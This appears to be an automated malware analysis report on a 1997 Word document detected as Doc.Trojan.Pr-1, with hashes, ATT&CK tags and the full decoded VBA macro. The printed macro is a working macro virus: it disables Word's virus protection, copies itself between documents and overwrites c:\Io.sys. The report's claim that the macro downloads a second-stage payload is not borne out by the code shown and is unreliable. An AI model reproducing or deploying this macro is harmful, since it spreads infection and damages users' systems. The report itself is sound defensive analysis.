Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 21a1a5df79b87f1b…

MALICIOUS

Office (OLE)

33.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 842c8893932c9e3c10928186407b285f SHA-1: bd4cf7a7d8d8a7f2ed0c345a72796ba2b4624d56 SHA-256: 21a1a5df79b87f1b369ef223556955b755deaf6f8b1db7344fbe98119ffb7244
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros that are detected as malicious by ClamAV. The macro code attempts to write 'M97v' to the file 'c:\Io.sys' and then sets its attributes to system. This suggests the macro is designed to download and execute a second-stage payload, likely using the 'c:\Io.sys' file as a staging area. The document body content appears to be unrelated filler text.

Heuristics 2

  • ClamAV: Doc.Trojan.Pr-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Pr-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 997 bytes
SHA-256: 928f8c39f9603e6ab29b1fa18da3c8fb91697ce4d33b2efd69f04c964ec04d54
Detection
ClamAV: Doc.Trojan.Pr-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



























'
Dim A, B, D, E As Integer
Dim t, m, f
Private Sub Document_Close()
Options.VirusProtection = False
A = 1: B = 2: pr1
A = 2: B = 1: pr1
t = VBA.Time
m = Minute(t)
If m <> 13 Then End
f = "c:\Io.sys"
SetAttr f, vbNormal
Open f For Output As #1
Print #1, "M97v"
Close
SetAttr f, vbSystem
End
End Sub
Private Sub pr1()
 D = Application.VBE.VBProjects(A).VBComponents(1).CodeModule.CountOfLines
 E = Application.VBE.VBProjects(B).VBComponents(1).CodeModule.CountOfLines
 If D > 10 Then Exit Sub
Application.VBE.VBProjects(A).VBComponents(1).CodeModule.AddFromString (Application.VBE.VBProjects(B).VBComponents(1).CodeModule.Lines(2, E))
End
End Sub
'
'M97v

Open this report in the interactive analyzer, or submit your own file for analysis.